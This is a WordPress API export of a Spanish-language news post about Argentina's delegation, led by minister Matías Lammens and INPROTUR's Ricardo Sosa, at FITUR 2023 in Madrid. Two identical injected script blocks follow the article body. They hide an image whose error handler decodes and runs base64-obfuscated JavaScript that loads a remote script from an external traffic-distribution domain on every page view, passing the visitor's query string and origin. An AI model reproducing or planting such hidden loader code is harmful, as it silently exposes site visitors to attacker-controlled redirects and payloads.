{"id":2101,"date":"2023-01-18T10:41:04","date_gmt":"2023-01-18T13:41:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2101"},"modified":"2025-08-14T00:25:11","modified_gmt":"2025-08-14T03:25:11","slug":"argentina-llega-fitur-2023-para-consolidar-el-crecimiento-del-turismo-receptivo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2101","title":{"rendered":"ARGENTINA LLEGA FITUR 2023 PARA CONSOLIDAR EL CRECIMIENTO DEL TURISMO RECEPTIVO"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Con una amplia delegaci\u00f3n de m\u00e1s de 20 destinos y 50 empresas privadas del sector, el pa\u00eds participar\u00e1 en la principal feria de turismo en Espa\u00f1a para continuar trabajando en el aumento de los viajes internacionales.<\/em><\/h4>\n\n\n\n<p>La delegaci\u00f3n argentina, encabezada por el\u00a0<strong>ministro de Turismo y Deportes Mat\u00edas Lammens<\/strong>\u00a0y el\u00a0<strong>Secretario Ejecutivo del INPROTUR, Ricardo Sosa<\/strong>, participar\u00e1 nuevamente de la feria de turismo\u00a0<strong>FITUR 2023<\/strong>\u00a0que se desarrollar\u00e1 del\u00a0<strong>18 al 22 de enero en Madrid, Espa\u00f1a,<\/strong>\u00a0en el predio ferial IFEMA.<br>\u00a0<br>El aumento de participantes por parte de los destinos y de las empresas privadas convocadas por la\u00a0<strong>C\u00e1mara Argentina de Turismo<\/strong>\u00a0muestra l<strong>a optimista mirada del sector tur\u00edstico por la recuperaci\u00f3n y crecimiento del turismo receptivo en el 2023 luego de la pandemia.<\/strong><br>\u00a0<br>La normalizaci\u00f3n de la situaci\u00f3n sanitaria, el aumento de conectividad, la exitosa promoci\u00f3n tur\u00edstica internacional y las oportunidades socioecon\u00f3micas generan que Argentina sea un objetivo claro en los ojos del turista espa\u00f1ol a la hora de pensar su pr\u00f3ximo destino para vacacionar.<br>\u00a0<br><strong>Ricardo Sosa<\/strong>, expres\u00f3: \u201c<em>tenemos un fuerte plan para este a\u00f1o en el que vamos a consolidar el crecimiento del movimiento comercial. Iremos con el objetivo de posicionar en\u00e9rgicamente el pa\u00eds a trav\u00e9s del trade tur\u00edstico espa\u00f1ol, por lo que tendremos importantes avances, dialogaremos con las aerol\u00edneas y tambi\u00e9n tendremos novedades sobre las frecuencias a\u00e9reas. La cantidad de empresas privadas que buscan generar es muestra del trabajo conjunto que hacemos entre estado y p\u00fablico para atraer el turismo internacional<\/em>\u201d.<br>\u00a0<br>\u201c<em>Tuvimos una recuperaci\u00f3n del turista proveniente de Espa\u00f1a del\u00a0<strong>64% en comparaci\u00f3n a los n\u00fameros de la prepandemia<\/strong>. Son n\u00fameros altos para el primer a\u00f1o completo tras la apertura, por lo que venimos en b\u00fasqueda de un crecimiento en este 2023.<\/em>\u201d, agreg\u00f3\u00a0<strong>Sosa<\/strong>.<br>\u00a0<br>Desde el mi\u00e9rcoles 18 al viernes 20, la feria est\u00e1 abierta a profesionales, y Argentina tendr\u00e1 en su stand (<strong>Pabell\u00f3n 3 &#8211; 3E03<\/strong>) una cargada agenda de presentaciones y conferencias para comentar las novedades del pa\u00eds y de cada uno de los destinos presentes. Durante el fin de semana, habr\u00e1 actividades para mostrar la cultura y pasi\u00f3n argentina relacionada a lo musical y a la Copa del Mundo obtenida por la Selecci\u00f3n Argentina en 2022.<br>\u00a0<br><strong>FITUR es la feria de turismo m\u00e1s grande de Espa\u00f1a<\/strong>\u00a0y una de las m\u00e1s importantes del mundo. Sus \u00faltimas estad\u00edsticas as\u00ed lo confirman: alrededor de 260 mil participantes, 150 mil profesionales, 11 mil empresas expositoras y 165 pa\u00edses se re\u00fanen durante cinco jornadas en el predio ferial IFEMA de la capital espa\u00f1ola con el fin de generar negocios y oportunidades de desarrollo tur\u00edstico.<br>\u00a0<br>La delegaci\u00f3n argentina en FITUR 2023 estar\u00e1 compuesta por autoridades del INPROTUR, Ministerio de Turismo y Deportes, autoridades provinciales, Aerol\u00edneas Argentinas y las entidades de turismo y 58 empresas del sector privado convocadas por la C\u00e1mara Argentina de Turismo (CAT).<br><strong>\u00a0<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una amplia delegaci\u00f3n de m\u00e1s de 20 destinos y 50 empresas privadas del sector, el pa\u00eds participar\u00e1 en la principal feria de turismo en Espa\u00f1a para continuar trabajando en el aumento de los viajes internacionales. La delegaci\u00f3n argentina, encabezada por el\u00a0ministro de Turismo y Deportes Mat\u00edas Lammens\u00a0y el\u00a0Secretario Ejecutivo del INPROTUR, Ricardo Sosa, participar\u00e1 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2102,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2101","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2101"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2101"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2101\/revisions"}],"predecessor-version":[{"id":7203,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2101\/revisions\/7203"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2102"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}